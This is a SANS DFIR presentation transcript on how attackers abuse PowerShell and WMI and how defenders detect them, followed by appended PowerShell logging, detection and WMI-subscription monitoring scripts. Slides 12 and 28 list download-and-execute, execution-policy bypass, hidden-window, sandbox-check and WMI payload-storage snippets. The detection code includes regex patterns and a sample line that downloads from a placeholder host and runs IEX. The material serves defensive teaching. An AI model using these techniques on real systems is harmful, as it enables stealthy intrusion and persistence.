
SANS DFIR Prague: PowerShell & WMI

My presentation from SANS DFIR Summit covering PowerShell and WMI.

  1. • Quick Background
     • Malicious Possibilities
     • Real-World Examples
     • Detection & Defense
  2. • Joe Slowik, Adversary Hunter
     • Current: Dragos Adversary Hunter
     • Previous:
       • Los Alamos National Lab: IR Lead
       • US Navy: Information Warfare Officer
       • University of Chicago: Philosophy Drop-Out
  3. • Scripting and interactive language
     • Introduced in 2006, integral to Win7+ since 2009
     • Full access to COM & WMI for system administration
  4. • WMI = Windows Management Instrumentation
     • Interactive and scriptable framework for local and remote administration
     • Frequently accessed via PowerShell
  5. http://oversitesentry.com/wp-content/uploads/2015/08/wmiarchitecture.png
  6. http://kevinpelgrims.com/blog/files/images/2010/02/powershell_rsm.png
  7. http://www.opentechguides.com/how-to/article/powershell/132/get-system-info-remotely.html
  8. https://4sysops.com/wp-content/uploads/2013/03/WBEMTest-Translate-into-PowerShell.png
  9. http://www.freeiconspng.com/img/17209
     • PowerShell is a powerful, useful tool for network administration
     • Widely used in Windows Enterprise environments
 10. • WMI enables significant access to review and modify system data
     • Access via PowerShell allows for scripting and automated possibilities
 11. • PowerShell’s ubiquity adds a significant capability for potential attackers
     • Enhances ability to ‘live off the land’
     • Expands initial infection vectors
 12. Command                                           Use
     -EncodedCommand                                   Accepts Base64-encoded input for execution within PowerShell
     (New-Object System.Net.WebClient).DownloadFile()  Download a file from a remote location; can be piped to Start-Process to execute
     -ExecutionPolicy Bypass                           Circumvent system limits on script execution
     -WindowStyle Hidden                               Hide the command window from the user
     Invoke-Expression                                 Execute arbitrary code or commands
 13. Delivery Vectors: VBA • VBS • BAT • JS • Registry • Startup • .lnk
 14. https://adsecurity.org/wp-content/uploads/2016/02/PowerShell-Detection-NetWebClientDownload.jpg
 15. • WMI is also ubiquitous, potent ‘dual-use’
     • Can enable:
       • Complex exploitation, persistence of infected host
       • New vectors to pivot within network
 16. • PsExec-like remote execution
     • Malicious file/script storage
     • Persistence when combined with file or registry activity
 17. • Pentesting frameworks
     • Crimeware/Commodity malware
     • APT
 18. • Malicious VBA decodes to PowerShell
     • Retrieves, then executes ransomware payload
 19. • WMI filter retrieved on schedule
     • Returns base64-encoded PowerShell
     • PowerShell re-launches backdoor
     • https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
 20. https://www.carbonblack.com/wp-content/uploads/2015/12/PS7.png
 21. CMD: • Command execution • Execution Parameters
     PowerShell: • Interactive and Scripts • Flags, Modifiers, full Visibility
     WMI: • Log Events • Correlate with Other Activity
 22. What is required to achieve ‘bad’? Process Execution • Persistence • Encode • Decode • Download • Upload
 23. • Sysinternals Sysmon
     • Windows Logging Service (WLS)
     • WMI Logging via WMI Subscription
     • PowerShell Logging
     • Proprietary Host-based Security
 24. • WLS incorporates PowerShell logging natively
     • Otherwise:
       • Windows 7+
       • PowerShell 5.0+
       • Enable logging!
     • See: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
 25. • Sysinternals Sysmon – latest version includes WMI visibility
     • But logging/alerting will need to be tuned
     • DIY via WMI Subscription creation
     • Otherwise – commercial products
 26. Establish Visibility → Baseline ‘Normal’ → Identify Malicious → Create Alerts & Alarms → Develop Response
 27. • What PowerShell/WMI scripts are used in ‘normal’ network administration?
     • What commands never have legitimate use?
     • What – if any – items require whitelisting?
 28. wmic /node:REMOTESYSTEM process call create "EVIL_COMMAND"
     SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE "%VMware%"
     $BADTHING = New-Object Management.ManagementClass($REMOTESYSTEM, [String]::Empty, $null)
     $BADTHING['__CLASS'] = 'Evil_Malware'
     $BADTHING.Properties.Add('SomethingEvil', [Management.CimType]::String, $False)
     $BADTHING.Properties['SomethingEvil'].Value = $PAYLOAD
     $BADTHING.Put()
 29. • Create Event Consumer: performs action when triggered by event
     • Pair with Event Filter: events of interest
     • Filter to Consumer Binding: bind filter to consumer
     • Export results to log file, data store
     • Credit: https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html
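The logging that slide 24 asks for, and a first pass at spotting the slide 12 flags in what it produces, as an added PowerShell example that is not part of the original deck. The registry keys are the documented PowerShell policy keys for script block, module and transcription logging; `$TranscriptDir`, the function names and the constructed sample lines at the bottom are assumptions made for this example.

```powershell
# Added example, not from the slide deck: turn on the PowerShell 5.0+ logging slide 24
# calls for (script block, module and transcription logging via the policy registry
# keys) and scan the resulting script block events for the flags listed on slide 12.
# Run from an elevated shell. $TranscriptDir is an assumed path; the sample script
# blocks at the bottom are constructed for offline testing, not captured from an incident.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\ProgramData\PSTranscripts')

    # Script block logging: Event ID 4104 in Microsoft-Windows-PowerShell/Operational
    # records the de-obfuscated text of each script block, i.e. what -EncodedCommand
    # decodes to and what Invoke-Expression actually runs.
    $sbl = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Module logging: Event ID 4103 pipeline execution details for every module ('*').
    $ml = Join-Path $PolicyRoot 'ModuleLogging'
    New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
    Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*'

    # Transcription: full text of every session written under $TranscriptDir.
    $tr = Join-Path $PolicyRoot 'Transcription'
    New-Item -Path $tr -Force | Out-Null
    Set-ItemProperty -Path $tr -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name OutputDirectory -Value $TranscriptDir
}

# Indicators from slide 12 (plus the -enc/-e shorthand and the IEX alias, which are the
# same switches spelled differently); -match is case-insensitive by default.
$SuspiciousPatterns = [ordered]@{
    EncodedCommand        = '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}'
    WebClientDownload     = 'System\.Net\.WebClient.*Download(File|String)'
    ExecutionPolicyBypass = '-ExecutionPolicy\s+Bypass'
    HiddenWindow          = '-WindowStyle\s+Hidden'
    InvokeExpression      = '\b(Invoke-Expression|IEX)\b'
}

function Test-ScriptBlockText {
    # Returns the names of every indicator matched by one script block (empty if none).
    param([Parameter(Mandatory)][string]$Text)
    $hits = @()
    foreach ($p in $SuspiciousPatterns.GetEnumerator()) {
        if ($Text -match $p.Value) { $hits += $p.Key }
    }
    return ,$hits
}

function Find-SuspiciousScriptBlocks {
    # Pulls recent 4104 events and reports the matching ones. Properties[2] holds the
    # script block text, Properties[3] the ScriptBlockId that ties split blocks together.
    param([int]$MaxEvents = 5000)
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $text = [string]$e.Properties[2].Value
        $hits = Test-ScriptBlockText -Text $text
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time          = $e.TimeCreated
                ScriptBlockId = $e.Properties[3].Value
                Indicators    = $hits -join ','
                Preview       = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Constructed samples: one benign admin line, two carrying the slide 12 flags. The
# encoded payload is just 'Get-Date' in UTF-16LE, the encoding -EncodedCommand expects.
$Encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Date'))
$Samples = @(
    'Get-Service -Name Spooler | Restart-Service',
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc $Encoded",
    '(New-Object System.Net.WebClient).DownloadFile("http://example.invalid/a.exe", "$env:TEMP\a.exe"); IEX $x'
)
foreach ($s in $Samples) {
    $hits = Test-ScriptBlockText -Text $s
    [pscustomobject]@{ Indicators = $(if ($hits.Count) { $hits -join ',' } else { '(clean)' }); Sample = $s }
}
```

Run `Enable-PowerShellLogging` once per host (or push the same keys by Group Policy), then `Find-SuspiciousScriptBlocks` is the starting point for the "what never has legitimate use?" review on slide 27: the first sample reports clean, the other two light up several indicators at once, which is the combination worth alerting on rather than any single flag.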
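The filter, consumer and binding recipe on slide 29, together with the baselining question on slide 27, as an added PowerShell example that is not part of the original deck: it lists the permanent WMI subscriptions already present on a host and then installs one that logs any new filter, consumer or binding to a text file, the "WMI monitoring WMI" approach the slide credits to FireEye. The `WMIMonitor_*` names, the log path, the function names and the Sysmon helper are assumptions of this example.

```powershell
# Added example, not from the slide deck: baseline the permanent WMI subscriptions on a
# host (the 'what is normal?' question on slide 27) and install the 'WMI monitoring WMI'
# subscription sketched on slide 29, which logs every new filter, consumer or binding to a
# text file. Requires an elevated shell. The 'WMIMonitor_*' names and the log path are
# assumptions chosen for this example.

$SubNs   = 'root\subscription'
$LogPath = 'C:\ProgramData\WMIMonitor\new_subscriptions.log'

function Get-WmiSubscriptionBaseline {
    # One row per permanent filter, consumer and binding, so an analyst can record what a
    # known-good build contains and diff other hosts against it.
    Get-WmiObject -Namespace $SubNs -Class __EventFilter | ForEach-Object {
        [pscustomobject]@{ Type = 'Filter';   Name = $_.Name;      Detail = $_.Query }
    }
    # __EventConsumer is abstract, so this returns CommandLine, ActiveScript, LogFile, ... consumers.
    Get-WmiObject -Namespace $SubNs -Class __EventConsumer | ForEach-Object {
        [pscustomobject]@{ Type = 'Consumer'; Name = $_.Name;      Detail = $_.__CLASS }
    }
    Get-WmiObject -Namespace $SubNs -Class __FilterToConsumerBinding | ForEach-Object {
        [pscustomobject]@{ Type = 'Binding';  Name = $_.__RELPATH; Detail = "$($_.Filter) -> $($_.Consumer)" }
    }
}

function Install-WmiSubscriptionMonitor {
    New-Item -ItemType Directory -Path (Split-Path $LogPath) -Force | Out-Null

    # Event filter: fires within 5 seconds of a new filter, consumer or binding instance
    # appearing in root\subscription.
    $query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE " +
             "TargetInstance ISA '__EventFilter' OR " +
             "TargetInstance ISA '__EventConsumer' OR " +
             "TargetInstance ISA '__FilterToConsumerBinding'"
    $filter = Set-WmiInstance -Namespace $SubNs -Class __EventFilter -Arguments @{
        Name = 'WMIMonitor_Filter'; EventNamespace = 'root/subscription'
        QueryLanguage = 'WQL'; Query = $query
    }

    # Event consumer: LogFileEventConsumer writes one templated line per event. __RELPATH
    # exists on every instance (bindings have no Name), so it identifies the new object.
    $consumer = Set-WmiInstance -Namespace $SubNs -Class LogFileEventConsumer -Arguments @{
        Name = 'WMIMonitor_Consumer'; Filename = $LogPath; IsUnicode = $false
        Text = 'New WMI subscription object: %TargetInstance.__RELPATH%'
    }

    # Filter-to-consumer binding: created last, so the monitor's own filter and consumer
    # are already in place and do not report themselves.
    Set-WmiInstance -Namespace $SubNs -Class __FilterToConsumerBinding -Arguments @{
        Filter = $filter; Consumer = $consumer
    } | Out-Null
}

function Remove-WmiSubscriptionMonitor {
    # Tear down in reverse order: binding, then consumer, then filter.
    Get-WmiObject -Namespace $SubNs -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like '*WMIMonitor_Filter*' } | Remove-WmiObject
    Get-WmiObject -Namespace $SubNs -Class LogFileEventConsumer -Filter "Name='WMIMonitor_Consumer'" | Remove-WmiObject
    Get-WmiObject -Namespace $SubNs -Class __EventFilter -Filter "Name='WMIMonitor_Filter'" | Remove-WmiObject
}

function Get-SysmonWmiEvents {
    # The tooling alternative from slide 25: Sysmon 6.10 and later record WMI filter (19),
    # consumer (20) and binding (21) activity when the config contains a WmiEvent rule.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 19, 20, 21 } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

# Typical use: record the baseline first, then install the monitor and watch the log file.
Get-WmiSubscriptionBaseline | Format-Table -AutoSize
Install-WmiSubscriptionMonitor
```

The baseline matters because the monitor will also report legitimate subscriptions created by management agents and installers; the entries recorded before installation are the whitelist slide 27 asks about, and anything else in the log file is a candidate for the alerting step on slide 26.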